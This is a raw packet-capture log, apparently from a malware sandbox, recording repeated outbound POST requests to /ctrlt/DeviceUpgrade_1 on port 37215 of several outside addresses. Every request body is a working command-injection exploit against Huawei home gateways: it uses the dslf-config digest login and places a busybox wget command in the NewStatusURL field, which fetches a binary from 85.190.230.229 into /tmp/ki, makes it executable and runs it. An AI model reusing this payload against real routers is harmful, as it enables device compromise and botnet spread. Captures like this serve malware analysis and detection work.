                                                                      Aug 2, 2024 13:18:06.951620102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      56192.168.2.1453672156.155.223.2737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.611102104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.942074060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.450109959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.442070961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.393992901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425842047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361490965 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976830959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951620102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      57192.168.2.1439262197.151.187.13437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.612318039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
